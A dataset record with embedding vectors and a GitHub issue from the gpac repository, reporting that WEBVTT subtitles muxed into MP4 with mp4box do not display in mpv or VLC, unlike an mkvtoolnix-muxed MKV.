0.023076258599758148, -0.008220517076551914, 0.015315987169742584, 0.016735080629587173, 0.01603192649781704, -0.0022405064664781094, 0.016760651022195816, 0.021644379943609238, -0.016249265521764755, -0.0165433119982481, -0.006187761202454567, -0.01780899055302143, -0.027972770854830742, -0.0017339155310764909, 0.0030091824010014534, 0.014369924552738667, 0.014472201466560364, 0.011659583076834679, 0.009812204167246819, -0.000018153175915358588, -0.018269237130880356, -0.0019288810435682535, -0.007945647463202477, 0.0008437855867668986, -0.0017610827926546335, 0.03620607405900955, -0.003445457899942994, -0.009741888381540775, -0.01577623374760151, -0.010649597272276878, -0.0002536950050853193, 0.022986765950918198, 0.016172558069229126, -0.011314397677779198, 0.012202929705381393, 0.0011594061506912112, 0.008380325511097908, 0.011224905028939247, -0.008674371987581253, 0.007127431221306324, -0.00568596413359046, 0.007657993584871292, -0.0025952800642699003, 0.01906188391149044, 0.007773055229336023, 0.00901955645531416, -0.017693927511572838, 0.016428250819444656, 0.0078561557456851, -0.016926851123571396, 0.024802183732390404, -0.006648007780313492, -0.02820289507508278, 0.005164990667253733, -0.0004618447565007955, 0.0046887630596756935, -0.002790245460346341, 0.023549288511276245, -0.01922808401286602, -0.018614422529935837, -0.005430271849036217, 0.009511765092611313, -0.015801802277565002, 0.004957240540534258, 0.010726304724812508, -0.0025713087525218725, -0.011934452690184116, -0.0043435781262815, 0.024955598637461662, 0.011998375877737999, 0.028023909777402878, 0.008674371987581253, 0.01095003541558981, 0.01162762101739645, -0.017156973481178284, 0.009594865143299103, -0.00901955645531416, 0.009665180929005146, -0.0022421046160161495, 0.002783853327855468, -0.019534915685653687, 0.004867747891694307, 0.023996751755475998, 0.01373069267719984, 0.014063093811273575, 0.008840572088956833, -0.02200234867632389, 0.01912580616772175, 0.027307970449328423, 0.014382708817720413, -0.0006172579596750438, -0.00737033924087882, -0.0023443815298378468, 0.024559274315834045, -0.03508102521300316, -0.0010771050583571196, 0.029660342261195183, -0.031859297305345535, -0.0016604039119556546, -0.007376731839030981, 0.0046727824956178665, -0.00121294183190912, 0.013411076739430428, 0.0070059774443507195, -0.00776666309684515, 0.007395908702164888, 0.00911544170230627, 0.01686292700469494, -0.03339345380663872, -0.009326388128101826, -0.01846100576221943, 0.013334369286894798, -0.0001254491799045354, 0.0035317540168762207, -0.019701115787029266, -0.009249679744243622, -0.0072872391901910305, -0.0027023511938750744, -0.018243666738271713, -0.008655195124447346, 0.025556476786732674, 0.017412666231393814, -0.0214142557233572, -0.026387477293610573, 0.01078383531421423, -0.025326352566480637, -0.019931238144636154, -0.0050627137534320354, 0.0011474206112325191, 0.00052177271572873, -0.004273262806236744, -0.015175356529653072, 0.004944455809891224, -0.0021078658755868673, -0.0195732694119215, 0.02375384233891964, -0.0056540025398135185, 0.010777443647384644, -0.009121833369135857, 0.04032272472977638, 0.0023555681109428406, -0.004950847942382097, -0.016594450920820236, -0.00022552887094207108, 0.012791022658348083, 0.006986800581216812, -0.004442659206688404, 0.027589231729507446, -0.011602051556110382, 0.000714341236744076, 0.004132631700485945, -0.009677965193986893, 0.0028413841500878334, 0.008469817228615284, 0.003749092807993293, -0.007964824326336384, 0.0033751423470675945, 0.008719118312001228, -0.00737033924087882, -0.006954838987439871, 0.004669586196541786, -0.009594865143299103, -0.015379910357296467, -0.027896063402295113, -0.015980787575244904, 0.009153795428574085, 0.00308429216966033, 0.002477022120729089, -0.008003178983926773, -0.00038373866118490696, -0.009882519021630287, -0.014970801770687103, 0.008719118312001228, -0.020532116293907166, -0.010067895986139774, -0.025466984137892723, 0.015149787068367004, -0.006206938065588474, 0.015137001872062683, 0.026489753276109695, 0.024789398536086082, -0.012816592119634151, -0.020276423543691635, 0.004065512213855982, 0.0175532978028059, 0.007830586284399033, -0.0013104246463626623, 0.0053152102045714855, 0.040501710027456284, 0.008565702475607395, -0.009933657944202423, 0.02150374837219715, -0.009045125916600227, -0.00493167107924819, 0.006750284694135189, 0.022782212123274803, 0.008757472038269043, -0.005871341563761234, -0.021184133365750313, 0.030708681792020798, 0.022961195558309555, -0.00844424869865179, -0.005660395137965679, -0.021618809551000595, 0.005363152362406254, 0.01095642801374197, 0.027819355949759483, 0.0040719048120081425, 0.0025777011178433895, 0.0063795302994549274, -0.007153000682592392, -0.0163643267005682, -0.002334793098270893, -0.005698748864233494, -0.023651566356420517, -0.012848553247749805, 0.003761877538636327, 0.011077881790697575, -0.00121134368237108, -0.03763795271515846, 0.020442623645067215, 0.01788569800555706, -0.01536712609231472, -0.03574582561850548, -0.012624822556972504, 0.012209322303533554, -0.009582080878317356, 0.004033551085740328, -0.012778238393366337, 0.001866556005552411, 0.010726304724812508, -0.000624049745965749, 0.00737033924087882, 0.007792232092469931, 0.015124217607080936, -0.013909677974879742, 0.01289329957216978, -0.013884108513593674, 0.007472616620361805, -0.003442261600866914, 0.018192529678344727, 0.013385508209466934, -0.009927265346050262, 0.025377491489052773, -0.030708681792020798, 0.007191354408860207, -0.014932448044419289, -0.006705538369715214, 0.00392168527469039, 0.021439824253320694, -0.015149787068367004, -0.012279637157917023, -0.00183619256131351, -0.004110258538275957, -0.013845754787325859, -0.0027854512445628643, -0.0034838118590414524, 0.01746380515396595, -0.010381120257079601, 0.009927265346050262, -0.005053125321865082, -0.009403095580637455, -0.0010003973729908466, -0.0072872391901910305, -0.004554524552077055, 0.031526897102594376, 0.004704744089394808, -0.023894473910331726, -0.0036755811888724566, -0.004733509384095669, -0.014727894216775894, -0.008405894041061401, -0.007402300834655762, 0.0004993996117264032, -0.007485400885343552, 0.01288690697401762, -0.027819355949759483, 0.005852164700627327, -0.003194559598341584, 0.005730710458010435, -0.01036833506077528, -0.011429459787905216, -0.003101870883256197, 0.020800594240427017, -0.020007945597171783, 0.0033144154585897923, -0.008399502374231815, -0.01971389912068844, -0.009633218869566917, -0.01474067848175764, 0.012260460294783115, -0.014919663779437542, 0.0008757471805438399, -0.0013008360983803868, 0.0145233403891325, 0.004321204964071512, 0.02585052326321602, 0.010323588736355305, 0.00225488911382854, 0.007517362479120493, 0.02879098802804947, -0.001960842637345195, 0.013973601162433624, -0.000053935160394757986, -0.00022912454733159393, 0.010106250643730164, 0.020033515989780426, 0.009473411366343498, 0.0025425434578210115, -0.01971389912068844, -0.0012321186950430274, 0.006344372872263193, -0.02082616277039051, -0.02360042743384838, 0.008808610029518604, 0.02351093478500843, -0.00004392219852888957, 0.0056380219757556915, 0.0017514943610876799, -0.0030011918861418962, -0.01062402781099081, -0.014050308614969254, 0.015916865319013596, 0.0088661415502429, -0.009172972291707993, 0.010298019275069237, -0.003781054401770234, -0.03477419540286064, 0.006737499963492155, 0.019931238144636154, -0.00044426589738577604, -0.016581665724515915, -0.007197747007012367, -0.004333989694714546, 0.01373069267719984, -0.009467018768191338, 0.009057910181581974, -0.015507756732404232, -0.03339345380663872, 0.0029660342261195183, 0.0014382709050551057, 0.0021989564411342144, 0.017681144177913666, -0.021874502301216125, -0.008290832862257957, -0.01931757666170597, -0.014727894216775894, -0.0056923567317426205, -0.01036194246262312, 0.02720569260418415, -0.0025713087525218725, -0.010521750897169113, -0.0234342273324728, -0.00852734874933958, -0.001764278975315392, 0.01789848320186138, 0.005647610407322645, -0.029839327558875084, -0.007709132041782141, 0.02131197787821293, 0.012752668932080269, 0.010310804471373558, -0.00903234165161848, 0.012317990884184837, -0.012771845795214176, -0.015456617809832096, -0.006456238217651844, 0.012228499166667461, 0.013232092373073101, 0.016850143671035767, 0.004564112983644009, -0.011653190478682518, 0.0014798209303990006, 0.0021270429715514183, -0.006795031018555164, -0.012023944407701492, -0.004449051339179277, 0.005053125321865082, 0.028663141652941704, 0.004794236272573471, -0.001440668012946844, -0.006871738936752081, 0.020186930894851685, -0.01431878563016653, -0.008131024427711964, -0.0014206920750439167, 0.00163243745919317, 0.011870529502630234, -0.003031555563211441, 0.007101862225681543, 0.02250094898045063, -0.011486990377306938, -0.003528557950630784, -0.009505372494459152, -0.0018234079470857978, -0.024316366761922836, 0.0027087435591965914, -0.0015924854669719934, -0.014331570826470852, -0.001962440786883235, -0.00267678196541965, 0.007830586284399033, -0.01679900474846363, -0.005794633645564318, -0.008463425561785698, -0.009498979896306992, -0.017693927511572838, 0.016811788082122803, -0.004548132419586182, -0.003487007925286889, 0.002622447209432721, 0.024559274315834045, -0.016492173075675964, -0.003963235300034285, -0.013538923114538193, 0.01314259972423315, -0.01646660454571247, -0.006270861253142357, 0.03318890184164047, 0.009914481081068516, 0.0145233403891325, 0.0047271172516047955, -0.01045143511146307, -0.012094260193407536, -0.008981202729046345, 0.0011769849807024002, -0.019765038043260574, 0.013909677974879742, -0.026067860424518585, 0.01788569800555706, -0.009326388128101826, 0.003960039466619492, -0.0066160461865365505, 0.0018042309675365686, 0.017745066434144974, -0.02435472048819065, 0.016824573278427124, 0.002389127854257822, -0.009217718616127968, 0.007670778315514326, 0.01998237706720829, 0.005906498990952969, 0.0008310009725391865, 0.02636190690100193, -0.010240488685667515, -0.0008725509978830814, 0.0006368344184011221, -0.0039888047613203526, -0.0032265211921185255, 0.0010515358299016953, -0.009230502881109715, -0.010547320358455181, 0.010214919224381447, -0.002552131889387965, -0.000018877306501963176, -0.009383918717503548, -0.015968002378940582, -0.005056321155279875, 0.01711861975491047, 0.011077881790697575, 0.001080301241017878, 0.002622447209432721, -0.005347171798348427, -0.0043531665578484535, -0.005826595239341259, 0.010304411873221397, -0.0059320684522390366, 0.004359559156000614, -0.004206143319606781, 0.008405894041061401, -0.012068690732121468, -0.01963719166815281, 0.001109865726903081, -0.0018553694244474173, -0.006523357704281807, -0.03318890184164047, -0.004321204964071512, -0.012592860497534275, 0.013372723013162613, 0.002213339088484645, -0.01754051260650158, -0.004823001567274332, -0.003713935147970915, 0.025287998840212822, 0.004576897714287043, -0.0024035105016082525, -0.0270267091691494, 0.004589682444930077, -0.0024434623774141073, -0.005864948965609074, 0.012560899369418621, 0.021963994950056076, 0.006082287989556789, -0.011237690225243568, -0.0066288309171795845, -0.002053531352430582, -0.00400798162445426, -0.01963719166815281, 0.005976814776659012, -0.007715524174273014, -0.013845754787325859, 0.019586052745580673, 0.014715109951794147, -0.0035093810874968767, -0.0242652278393507, -0.009435056708753109, -0.0037107388488948345, 0.0021110621746629477, -0.016760651022195816, -0.002214937238022685, -0.006433865055441856, -0.014510555192828178, -0.02166994847357273, 0.029097817838191986, 0.03738225996494293, -0.015137001872062683, -0.005570902489125729, 0.009735495783388615, 0.008789433166384697, 0.014242078177630901, -0.0031354306265711784, 0.004241301212459803, 0.0102021349593997, 0.006507376674562693, 0.029276803135871887, 0.010413081385195255, -0.010138211771845818, -0.005701945163309574, -0.016006357967853546, 0.014331570826470852, 0.01247140672057867, -0.009767457842826843, 0.015303202904760838, 0.025543691590428352, 0.011608444154262543, 0.0025777011178433895, -0.0012744677951559424, -0.009882519021630287, -0.031168928369879723, -0.0017259251326322556, 0.009473411366343498, 0.03364914655685425, 0.005980010610073805, -0.005701945163309574, 0.01011264231055975, 0.005513371899724007, 0.007747485768049955, -0.00911544170230627, -0.0004414692521095276, -0.012829376384615898, -0.009038733318448067, 0.0009548520902171731, -0.013001969084143639, -0.01435714028775692, -0.01610863395035267, 0.010393904522061348, -0.013628415763378143, 0.021695517003536224, -0.00309707666747272, 0.031168928369879723, -0.005711533594876528, 0.018691129982471466, 0.01062402781099081, 0.007440655026584864, -0.0014918065862730145, -0.011870529502630234, -0.01255450677126646, -0.007153000682592392, 0.006344372872263193, -0.013155384920537472, -0.0049955942668020725, 0.010329981334507465, -0.0031673922203481197, -0.008194947615265846, -0.005765868350863457, 0.024418644607067108, 0.0222452562302351, 0.011781036853790283, 0.002291644923388958, 0.024572059512138367, 0.01964997686445713, -0.0030203689821064472, -0.03201271593570709, 0.008162986487150192, -0.03380256146192551, 0.015264848247170448, -0.004330793395638466, 0.00392168527469039, -0.00745343929156661, 0.006692754104733467, 0.03129677474498749, -0.010336373932659626, 0.00038254010723903775, -0.011154590174555779, -0.00027946403133682907, -0.0252752136439085, -0.002135033253580332, 0.0022708699107170105, -0.004896513186395168, 0.02586330659687519, -0.0037842504680156708, -0.012426660396158695, -0.01906188391149044, 0.01044504251331091, -0.025914445519447327, 0.0214142557233572, -0.009997581131756306, -0.0017323173815384507, -0.006120641715824604, 0.004775059409439564, 0.022641580551862717, -0.005497390870004892, -0.01448498573154211, -0.015213710255920887, 0.020532116293907166, -0.005139421205967665, -0.007728308904916048, -0.012177360244095325, 0.004826197866350412, -0.010834974236786366, -0.004461836069822311, 0.01924086920917034, 0.016773434355854988, 0.00015291616728063673, -0.015622817911207676, 0.0053855255246162415, 0.0024146970827132463, -0.002047138987109065, 0.005887322127819061, -0.008111847564578056, -0.016057495027780533, 0.015303202904760838, 0.006571299862116575, -0.007153000682592392, -0.00910265650600195, -0.024661552160978317, -0.017834559082984924, 0.00259368191473186, -0.011928060092031956, -0.006408296059817076, -0.012043122202157974, 0.002638428006321192, -0.0009292828035540879, 0.006974015850573778, -0.01054092776030302, 0.002772666746750474, 0.014139801263809204, -0.005219325423240662, -0.0037906428333371878, 0.028356309980154037, -0.0171953272074461, 0.004123043268918991, 0.054206833243370056, -0.0069931927137076855, 0.004893317352980375, 0.025134583935141563, 0.001362362178042531, 0.002938866848126054, -0.015673955902457237, 0.01630040444433689, 0.018000759184360504, -0.022769426926970482, -0.006532946135848761, 0.021452609449625015, -0.015315987169742584, 0.016249265521764755, 0.01821809820830822, -0.025978369638323784, 0.015379910357296467, 0.0157123114913702, -0.001494203694164753, -0.04528316110372543, -0.018000759184360504, 0.03620607405900955, 0.018435437232255936, 0.013628415763378143, -0.015303202904760838, -0.01389689277857542, 0.005468625575304031, 0.00501477112993598, -0.00006427273183362558, -0.0010115838376805186, 0.024814967066049576, -0.02081337757408619, 0.0056540025398135185, -0.03040185011923313, -0.00978024210780859, -0.031015513464808464, -0.005407898686826229, -0.011972806416451931, 0.004832590464502573, -0.0091921491548419, -0.006961231119930744, 0.004225320182740688, 0.0025840934831649065, -0.00535036763176322, 0.015009156428277493, 0.012778238393366337, -0.02131197787821293, 0.01646660454571247, 0.005590079817920923, -0.00146463920827955, 0.015546110458672047, -0.020864516496658325, -0.038072630763053894, 0.010470611974596977, 0.0011793820885941386, 0.02082616277039051, -0.003330396255478263, -0.006497788242995739, 0.005059517454355955, -0.020954009145498276, 0.003742700442671776, -0.0026016721967607737, 0.0035573234781622887, -0.007657993584871292, -0.018844544887542725, -0.029609203338623047, -0.005967226345092058, -0.0010427463566884398, 0.016722297295928, 0.0018106232164427638, 0.005123440641909838, -0.00013353946269489825, -0.005280052311718464, -0.0053599560633301735, -0.023958398029208183, 0.008616840466856956, 0.001962440786883235, -0.013807401061058044, -0.00861044880002737, 0.006053522229194641, 0.004519366659224033, -0.03288206830620766, -0.014127016067504883, -0.02586330659687519, 0.002910101553425193, -0.013423861935734749, -0.03280536085367203, -0.021452609449625015, -0.0001579101663082838, 0.0193942841142416, 0.035132162272930145, 0.0012488985667005181, -0.012011160142719746, -0.010042327456176281, -0.0032249230425804853, -0.011921667493879795, 0.013602846302092075, -0.02735910937190056, 0.020199716091156006, 0.015584464184939861, -0.018026329576969147, 0.0010107848793268204, -0.012944438494741917, 0.02073667012155056, 0.013832969591021538, -0.015673955902457237, 0.025134583935141563, -0.007089077495038509, 0.014024739153683186, -0.011333574540913105, 0.0053535639308393, -0.010815797373652458, -0.01797519065439701, -0.004266870208084583, 0.006763069424778223, -0.010758266784250736, 0.009882519021630287, -0.0014087064191699028, 0.0010811003157868981, -0.004998790565878153, -0.0034646347630769014, -0.0004662394931074232, -0.00476866727694869, 0.00961404200643301, -0.004023962188512087, -0.013526138849556446, 0.029788188636302948, 0.006833384744822979, -0.004797432571649551, 0.0008294028812088072, -0.004145416431128979, -0.013666769489645958, 0.008329186588525772, -0.012950830161571503, 0.013193738646805286, -0.0008214124827645719, 0.01930479146540165, 0.012675960548222065, 0.004528955090790987, 0.0030075842514634132, 0.014779032208025455, 0.019113022834062576, -0.005324798636138439, -0.006462630815804005, -0.013743477873504162, 0.002309223869815469, -0.0212352704256773, 0.010713520459830761, 0.009543726220726967, 0.010317197069525719, 0.0015021940926089883, 0.0034614386968314648, 0.01002954225987196, 0.014472201466560364, 0.009204933419823647, 0.01663280464708805, -0.017847344279289246, 0.0031769806519150734, 0.003025163197889924, -0.04180574044585228, 0.025927230715751648, 0.020506547763943672, 0.01630040444433689, -0.018115820363163948, 0.003271267283707857, 0.0011178561253473163, -0.008629625663161278, 0.0010251675266772509, -0.004206143319606781, -0.0024466586764901876, -0.02291005663573742, 0.002729518571868539, -0.02551812119781971, 0.01029162760823965, 0.012612037360668182, 0.026898862794041634, -0.005970422178506851, 0.0038609583862125874, 0.011320790275931358, 0.008476209826767445, -0.010502574034035206, -0.019087452441453934, -0.003282453864812851, -0.0025777011178433895, 0.03306105360388756, 0.028100617229938507, 0.012599253095686436, 0.03040185011923313, -0.0035125771537423134, 0.00493167107924819, -0.02124805562198162, 0.02351093478500843, -0.011685152538120747, -0.006986800581216812, -0.00644664978608489, 0.018320376053452492, 0.0018345944117754698, 0.0031418229918926954, 0.0242652278393507, -0.008584879338741302, -0.02351093478500843, -0.011097058653831482, 0.03638505935668945, -0.011525344103574753, -0.04405583441257477, -0.006801423151046038, -0.004327597562223673, -0.004410697612911463, -0.002432276029139757, -0.01678621955215931, -0.005395113956183195, 0.0059736184775829315, 0.002521768445149064, 0.0075365393422544, 0.02131197787821293, 0.01839708350598812, 0.02963477373123169, -0.010266058146953583, 0.0038609583862125874, 0.01702912710607052, 0.004308420233428478, -0.020877301692962646, -0.03551570326089859, -0.000737912894692272, -0.006152603309601545, 0.00367238512262702, 0.007415085565298796, 0.008878925815224648, 0.0193942841142416, -0.013321585021913052, -0.012023944407701492, 0.021452609449625015, 0.00417418172582984, 0.03814933821558952, -0.009383918717503548, -0.008150202222168446, 0.02048097737133503, 0.02669430896639824, -0.014216508716344833, -0.0150730786845088, -0.007491793483495712, 0.022731073200702667, 0.0016340356087312102, 0.023907259106636047, 0.02484053745865822, 0.04175460338592529, 0.0014981988351792097, 0.02368992008268833, -0.007108254358172417, -0.00016280428098980337, 0.001176186022348702, -0.000359967234544456, -0.000014295314031187445, 0.024124598130583763, -0.005695553030818701, -0.002216535387560725, 0.012938045896589756, 0.01431878563016653, 0.012695138342678547, 0.018103037029504776, -0.006903700530529022, -0.0017355135641992092, 0.0007435061852447689, -0.004976417403668165, 0.01028523501008749, 0.012017552740871906, -0.007191354408860207, -0.006465826649218798, 0.00004234908919897862, 0.01367955468595028, 0.007415085565298796, -0.003937666304409504, -0.00034738238900899887, 0.005209736991673708, 0.020634394139051437, -0.008386717177927494, -0.01711861975491047, 0.01982896216213703, -0.023536505177617073, -0.006353961303830147, 0.01028523501008749, 0.011653190478682518, -0.00493167107924819, -0.006679969374090433, -0.013628415763378143, -0.000497801520396024, 0.009837772697210312, 0.00552296033129096, 0.02005908451974392, 0.002544141374528408, 0.004241301212459803, -0.003883331548422575, -0.006325196009129286, -0.0023012333549559116, 0.009224111214280128, -0.0019176945788785815, -0.0135133545845747, 0.005551725625991821, 0.005660395137965679, 0.008239693939685822, -0.0050083789974451065, -0.02955806441605091, -0.014830171130597591, 0.004477816633880138, -0.019918454810976982, 0.01806468330323696, -0.021388687193393707, 0.0033687499817460775, -0.0019896081648766994, 0.015520540997385979, -0.03738225996494293, 0.0018329963786527514, -0.0016827769577503204, 0.021465394645929337, 0.013117030262947083, 0.006254880223423243, 0.005027555860579014, 0.009505372494459152, -0.005529352463781834, -0.011576483026146889, -0.005842576269060373, 0.009307211264967918, 0.006571299862116575, 0.01931757666170597, -0.005724318325519562, -0.007491793483495712, -0.014331570826470852, 0.010930858552455902, 0.01889568381011486, 0.010687950998544693, -0.014727894216775894, 0.01196641381829977, -0.002552131889387965, -0.007063508033752441, -0.0020439426880329847, -0.021375901997089386, 0.006961231119930744, 0.008463425561785698, 0.004052727948874235, 0.03206385299563408, -0.024699905887246132, -0.008150202222168446, -0.0015053902752697468, -0.03242182359099388, 0.0015860932180657983, -0.007491793483495712, 0.001235314877703786, -0.011499774642288685, -0.008175770752131939, 0.023792197927832603, 0.021848933771252632, 0.026592031121253967, 0.016159772872924805, -0.0163643267005682, 0.002600074280053377, 0.0017850539879873395, -0.016185341402888298, 0.0015237681800499558, 0.0027854512445628643, -0.004589682444930077, -0.012688745744526386, -0.023907259106636047, -0.016517741605639458, -0.0011913677444681525, 0.014280431903898716, 0.002400314435362816, -0.022360319271683693, -0.006878131069242954, 0.0038130159955471754, 0.005053125321865082, -0.011263259686529636, -0.00042948368354700506, -0.01502194069325924, 0.014280431903898716, -0.014382708817720413, -0.011013958603143692, -0.0010179762030020356, 0.028100617229938507, 0.021056286990642548, 0.0019400676246732473, -0.0020679139997810125, -0.002646418521180749, 0.006299626547843218, 0.008546525612473488, -0.0038673507515341043, -0.01796240545809269, 0.01112262811511755, -0.017770636826753616, 0.00045864860294386744, -0.00742787029594183, 0.008367540314793587, 0.00918575655668974, 0.0047271172516047955, 0.005906498990952969, -0.012100652791559696, 0.01196641381829977, 0.011531736701726913, 0.005928872153162956, -0.007485400885343552, -0.00250738556496799, -0.0018937233835458755, 0.004209339618682861, 0.022424241527915, -0.020110223442316055, 0.03937666118144989, 0.004362754989415407, 0.004711136221885681, 0.012433052994310856, -0.0024802181869745255, -0.01196641381829977, 0.016722297295928, -0.001188171561807394, 0.030120588839054108, -0.001019574236124754, 0.023625995963811874, -0.011704329401254654, 0.000062225190049503, -0.0033080230932682753, -0.003499792655929923, -0.015546110458672047, -0.0015373517526313663, -0.009345564991235733, 0.009908088482916355, 0.008840572088956833, -0.018448222428560257, 0.0013823381159454584, 0.015648387372493744, 0.020123008638620377, -0.010918074287474155, 0.025070659816265106, 0.011186551302671432, 0.006814207881689072, -0.009211326017975807, -0.023779412731528282, 0.02007186971604824, 0.01578901894390583, 0.0032680712174624205, -0.014293217100203037, -0.006011972203850746, -0.010585674084722996, -0.01924086920917034, 0.019202515482902527, 0.024559274315834045, -0.022398672997951508, 0.007076292764395475, -0.02108185552060604, -0.02182336337864399, -0.005567706655710936, 0.017745066434144974, 0.02930237352848053, -0.010675166733562946, 0.02049376256763935, 0.04201029613614082, 0.007753878366202116, 0.015405479818582535, -0.015469403006136417, 0.00040850890218280256, 0.01613420434296131, -0.006750284694135189, 0.020775023847818375, 0.002226123819127679, -0.006718323100358248, -0.013692338950932026, -0.003138626692816615, -0.013436646200716496, -0.015200925059616566, 0.012062299065291882, -0.0010747079504653811, -0.02937908098101616, 0.020429838448762894, -0.012458622455596924, 0.019752254709601402, -0.003694758052006364, 0.02735910937190056, 0.008322793990373611, -0.004560916684567928, -0.00426047807559371, 0.017847344279289246, 0.005497390870004892, -0.003499792655929923, 0.016415465623140335, -0.01847379095852375, -0.012209322303533554, 0.005238502286374569, 0.002125444822013378, 0.021593241021037102, 0.00343267316929996, -0.0000893925316631794, 0.004129435401409864, 0.0056923567317426205, -0.012669568881392479, -0.016325972974300385, -0.013385508209466934, 0.01830759085714817, 0.022040702402591705, 0.007728308904916048, -0.013078676536679268, -0.012528937309980392, 0.00434677442535758, -0.00308429216966033, -0.023357519879937172, 0.0020311581902205944, 0.011531736701726913, -0.0009316799114458263, -0.008214125409722328, -0.0022724680602550507, -0.007632424123585224, 0.02216854877769947, 0.004976417403668165, 0.0035253618843853474, 0.019036315381526947, -0.011493382975459099, -0.020468194037675858, 0.015200925059616566, 0.01561003364622593, -0.0028765418101102114, 0.002417893148958683, -0.01242026872932911, -0.006622438319027424, 0.0034902039915323257, -0.006392315030097961, -0.005059517454355955, -0.004180574323982, -0.004602466709911823, -0.004589682444930077, 0.010080681182444096, -0.0014574478846043348, 0.010227704420685768, -0.0004334788827691227, -0.017080266028642654, 0.0025313568767160177, 0.010042327456176281, 0.006679969374090433, 0.012548115104436874, -0.005133029073476791, -0.00493486737832427, -0.00003605665187933482, 0.0026448203716427088, 0.01821809820830822, 0.027819355949759483, -0.006814207881689072, 0.005033947993069887, 0.01788569800555706, -0.0031594017054885626, -0.004947652108967304, 0.06821878999471664, -0.014651186764240265, 0.0019848139490932226, -0.016645587980747223, 0.00171633658464998, -0.007657993584871292, -0.009940049611032009, -0.0010882916394621134, -0.011301613412797451, 0.009339172393083572, -0.00038913218304514885, 0.028254032135009766, 0.0021094640251249075, 0.0009109048987738788, 0.031194498762488365, -0.030759820714592934, 0.0035956772044301033, 0.005832987371832132, 0.020532116293907166, 0.010355550795793533, -0.009371134452521801, -0.00034818140557035804, 0.024751044809818268, -0.017514944076538086, 0.012982792221009731, -0.0010355550330132246, -0.001938469591550529, 0.022270826622843742, 0.008322793990373611, -0.007146608550101519, -0.0025888876989483833, 0.02804947830736637, 0.011001174338161945, 0.018026329576969147, -0.01095003541558981, 0.006226114928722382, -0.00877025630325079, -0.00333678862079978, 0.011659583076834679, -0.007555716671049595, 0.026131784543395042, -0.008361148647964, 0.00493167107924819, -0.006369941867887974, 0.019496561959385872, -0.023025119677186012, -0.004215731751173735, 0.006130230147391558, -0.009377526119351387, 0.008361148647964, -0.01954769901931286, 0.01544383354485035, 0.0011314398143440485, -0.01930479146540165, -0.005906498990952969, 0.010329981334507465, 0.004202947020530701, 0.012369129806756973, -0.001848977175541222, 0.0044362666085362434, -0.01221571397036314, 0.0040591200813651085, 0.026668738573789597 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
- [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Hello. I have a problem about muxing WEBVTT subtitle to mp4box. On muxed mp4 video using mp4box with WEBVTT won't show the subtitle only in mpv or VLC. In mkvtoolnix muxed mkv with webvtt, it shows correct subtitle. See the two screenshots and shared files below: WEBVTT texts: ``` WEBVTT 00:00.000 --> 00:02.000 Test ``` OS: Windows 11 Pro 21H2 mp4box version: 2.1-DEV-rev259-gfc4749f9-master mp4box + mkvtoolnix muxed file: https://mega.nz/folder/nxVlgKYZ#HMLcZzKwtVDgIpSAAG6h3Q mkvtoolnix muxed: ![mkvtoolnixmuxed](https://user-images.githubusercontent.com/88035011/185731203-1c4c1749-4d7e-42dc-a6d4-a533c998349f.png) mp4box muxed: ![mp4boxmuxed](https://user-images.githubusercontent.com/88035011/185731221-67a3fef3-2172-4c7b-b0eb-6461f63bb817.png) - Martin Eesmaa
Format "wvtt" of WEBVTT subtitle muxed of mp4box won't show subtitle.
https://api.github.com/repos/gpac/gpac/issues/2243/comments
2
2022-08-20T05:59:58
2022-08-25T05:15:36Z
https://github.com/gpac/gpac/issues/2243
1,345,066,874
2,243
false
This is a GitHub Issue repo:gpac owner:gpac Title : Format "wvtt" of WEBVTT subtitle muxed of mp4box won't show subtitle. Issue date: --- start body --- - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Hello. I have a problem about muxing WEBVTT subtitle to mp4box. On muxed mp4 video using mp4box with WEBVTT won't show the subtitle only in mpv or VLC. In mkvtoolnix muxed mkv with webvtt, it shows correct subtitle. See the two screenshots and shared files below: WEBVTT texts: ``` WEBVTT 00:00.000 --> 00:02.000 Test ``` OS: Windows 11 Pro 21H2 mp4box version: 2.1-DEV-rev259-gfc4749f9-master mp4box + mkvtoolnix muxed file: https://mega.nz/folder/nxVlgKYZ#HMLcZzKwtVDgIpSAAG6h3Q mkvtoolnix muxed: ![mkvtoolnixmuxed](https://user-images.githubusercontent.com/88035011/185731203-1c4c1749-4d7e-42dc-a6d4-a533c998349f.png) mp4box muxed: ![mp4boxmuxed](https://user-images.githubusercontent.com/88035011/185731221-67a3fef3-2172-4c7b-b0eb-6461f63bb817.png) - Martin Eesmaa --- end body ---
1,473
[ -0.008394598960876465, 0.022784285247325897, -0.01630191132426262, 0.00953159760683775, 0.010402805171906948, 0.019653845578432083, -0.012440544553101063, 0.050264228135347366, -0.02950291708111763, 0.018177222460508347, 0.0013243458233773708, 0.03007880039513111, 0.002604392822831869, 0.005840041674673557, -0.014389686286449432, 0.01678919792175293, 0.008623475208878517, 0.03694509342312813, -0.04193607717752457, 0.024999218061566353, -0.012396245263516903, -0.002491800347343087, 0.002296147868037224, 0.02652014046907425, 0.005541025660932064, 0.0012966591166332364, -0.05159318819642067, 0.03410997986793518, -0.01757180690765381, -0.012270732782781124, 0.018900766968727112, 0.019033662974834442, -0.007368346210569143, 0.020539818331599236, 0.04270392283797264, 0.02012636512517929, 0.05076628178358078, 0.062490664422512054, 0.001157302875071764, 0.00885235145688057, -0.05020516365766525, -0.03670883551239967, -0.03602958843111992, 0.0035051326267421246, -0.032249435782432556, 0.0067924633622169495, -0.004754724446684122, 0.010491402819752693, -0.014891738072037697, -0.05058908462524414, 0.010986071079969406, -0.027036957442760468, -0.022429894655942917, -0.03874657303094864, -0.00004781718962476589, -0.013939316384494305, 0.043855685740709305, -0.002604392822831869, -0.01616901531815529, 0.015430704690515995, 0.0009459612774662673, -0.0033427041489630938, 0.007700586225837469, 0.03532081097364426, 0.00039707301766611636, 0.018044326454401016, -0.02529454231262207, 0.013252686709165573, -0.033519331365823746, 